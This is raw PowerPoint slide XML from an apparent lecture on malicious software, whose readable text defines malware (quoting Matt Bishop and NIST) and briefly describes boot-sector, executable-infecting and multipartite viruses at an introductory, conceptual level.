                        <a:t>boo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="0" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>record code</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>18</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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739389" y="3062477"/>
            <a:ext cx="1024127" cy="65227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775966" y="3267455"/>
            <a:ext cx="950213" cy="242315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="950213" h="242315">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="242315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950213" y="242315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95021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124455" y="2000250"/>
            <a:ext cx="950213" cy="63322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074670" y="1981200"/>
            <a:ext cx="148589" cy="6522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789176" y="3062477"/>
            <a:ext cx="950213" cy="63398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763517" y="3062477"/>
            <a:ext cx="149351" cy="63398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260594" y="2372851"/>
            <a:ext cx="223263" cy="167630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="223263" h="167630">
                <a:moveTo>
                  <a:pt x="186689" y="112007"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="149354" y="167630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223263" y="55622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186689" y="112007"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="18632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260597" y="2372867"/>
            <a:ext cx="223265" cy="167639"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="223265" h="167639">
                <a:moveTo>
                  <a:pt x="223265" y="55625"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149351" y="167639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186689" y="112013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223265" y="556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447283" y="2503142"/>
            <a:ext cx="502916" cy="316991"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="502916" h="316991">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="503123" y="316865"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="18634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838194" y="2875756"/>
            <a:ext cx="112006" cy="149348"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112006" h="149348">
                <a:moveTo>
                  <a:pt x="74670" y="19044"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="112006" y="37327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37335" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74670" y="19044"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="18628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838194" y="2875788"/>
            <a:ext cx="112013" cy="149351"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="112013" h="149351">
                <a:moveTo>
                  <a:pt x="112013" y="37337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74675" y="19050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37337" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112013" y="373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912865" y="2838416"/>
            <a:ext cx="18293" cy="37340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18293" h="37340">
                <a:moveTo>
                  <a:pt x="0" y="37340"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18293" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="18626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14" name="object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9626111"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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1703">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="272478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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Executable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Infectors</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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00600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="1654175">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="2604770" algn="l"/>
                          <a:tab pos="3517265" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" baseline="10000" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>0	100	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>First program instruction to be e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="-9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1600" spc="-70" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ecuted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="-2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spc="0" baseline="10000" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>1000</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" baseline="10000" dirty="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400"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="50"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1400" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1318895">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="2269490" algn="l"/>
                          <a:tab pos="3255645" algn="l"/>
                          <a:tab pos="6572250" algn="l"/>
                          <a:tab pos="7540625" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>0	100	200	1000	1100</a:t>
                      </a:r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100"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="85"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1106805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1106170" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="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1106805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1106170" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-150" dirty="0" smtClean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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>virus that infects executable programs</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="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10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1678305" lvl="1" indent="-4572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1677670" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2300" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Can</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="1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300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>infect either .EXE or .COM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="1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300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>on PCs</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1678305" marR="1181735" lvl="1" indent="-4572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1677670" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2300" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>May prepend</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="-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300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>itself (as shown) or</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="-1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300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>put itself anywhere, fixing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" spc="-1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300" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>up binary so it is executed at some point</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>19</a:t>
                      </a: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5" name="object 15"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1789002" y="3062273"/>
          <a:ext cx="6594333" cy="6332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498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45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5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714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33221">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="148590">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Header</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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8633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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7465">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Virus code</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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8633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="18638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6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8624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1862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99820">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="105" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ecutable code and data</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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8624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="18638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6" name="object 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2124279" y="2000052"/>
          <a:ext cx="5569450" cy="6332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498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706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33221">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="129540">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Header</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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8633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18633">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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6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8624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1862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124075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1600" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="-40" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ecutable code and data</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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8624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="18638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1703">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="212026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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Software</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Defined</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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00600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="840740" marR="1184275">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3200" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>“Executable instructions that cause security policy to be violated.”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="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200" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>–Matt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="-1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200" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Bishop</a:t>
                      </a:r>
                      <a:endParaRPr sz="32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300"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="75"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="840740" marR="508000" indent="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-18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200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>program that is inserted into a system, usually covertl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-210" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, with the intent of compromising the confidentialit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-210" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, integrit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-210" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, or availability of the victim</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-180" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-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200" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>data, applications, or operating system or otherwise annoying or disrupting the victim.” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>– N</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ST</a:t>
                      </a:r>
                      <a:endParaRPr sz="32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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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82130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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Multipartite</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-55" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>V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iruses</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1562100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A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-17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virus that can infect either</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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boot sectors or executables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 panose="020B0604020202020204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spc="-215" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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ypicall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-200" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y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,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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two parts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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>One part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boot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sector</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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infector</a:t>
                      </a:r>
